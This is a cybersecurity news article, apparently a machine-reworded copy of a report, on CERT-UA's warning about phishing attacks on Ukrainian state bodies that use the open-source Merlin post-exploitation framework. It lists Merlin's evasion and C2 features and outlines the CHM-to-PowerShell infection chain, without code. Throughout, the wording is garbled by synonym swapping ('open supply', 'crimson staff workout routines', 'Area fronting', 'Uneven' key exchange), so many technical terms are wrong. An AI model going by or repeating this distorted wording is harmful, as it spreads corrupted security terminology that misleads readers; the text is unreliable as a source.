Home Cyber Security Hackers use open supply Merlin post-exploitation toolkit in assaults

Hackers use open supply Merlin post-exploitation toolkit in assaults

Hackers use open supply Merlin post-exploitation toolkit in assaults


Hacker monitoring screens

Ukraine is warning of a wave of assaults concentrating on state organizations utilizing ‘Merlin,’ an open-source post-exploitation and command and management framework.

Merlin is a Go-based cross-platform post-exploitation toolkit obtainable without spending a dime by way of GitHub, providing intensive documentation for safety professionals to make use of in crimson staff workout routines.

It presents a variety of options, permitting crimson teamers (and attackers) to acquire a foothold on a compromised community.

  • Assist for HTTP/1.1 over TLS and HTTP/3 (HTTP/2 over QUIC) for C2 communication.
  • PBES2 (RFC 2898) and AES Key Wrap (RFC 3394) for agent visitors encryption.
  • OPAQUE Uneven Password Authenticated Key Alternate (PAKE) & Encrypted JWT for safe consumer authentication.
  • Assist for CreateThread, CreateRemoteThread, RtlCreateUserThread, and QueueUserAPC shellcode execution methods.
  • Area fronting for bypassing community filtering.
  • Built-in Donut, sRDI, and SharpGen help.
  • Dynamic change within the agent’s JA3 hash & C2 visitors message padding for evading detection.

Nevertheless, as we noticed with Sliver, Merlin is now being abused by menace actors who use it to energy their very own assaults and unfold laterally by compromised networks.

CERT-UA studies that it detected it in assaults that began with the arrival of a phishing e mail that impersonated the company (sender deal with: cert-ua@ukr.web) and supposedly offered the recipients with directions on how one can harden their MS Workplace suite.

Sample of the malicious email
Pattern of the malicious e mail
Supply: CERT-UA

The emails carry a CHM file attachment that, if opened, executes JavaScript code which in flip runs a PowerShell script that fetches, decrypts, and decompresses a GZIP archive that accommodates the executable “ctlhost.exe.”

If the recipient runs this executable, their laptop will get contaminated by MerlinAgent, giving the menace actors entry to their machine, information, and a foothold to maneuver laterally within the community.

Executable that loads Merlin agent on the system
Executable that hundreds Merlin agent on the system
Supply: CERT-UA

CERT-UA has assigned this malicious exercise the distinctive identifier UAC-0154, and the primary assaults had been recorded on July 10, 2023, when the menace actors used a “UAV coaching” bait of their emails.

Utilizing open-source instruments like Merlin to assault authorities businesses or different vital organizations makes attribution tougher, leaving fewer distinct traces that may be linked to particular menace actors.



Please enter your comment!
Please enter your name here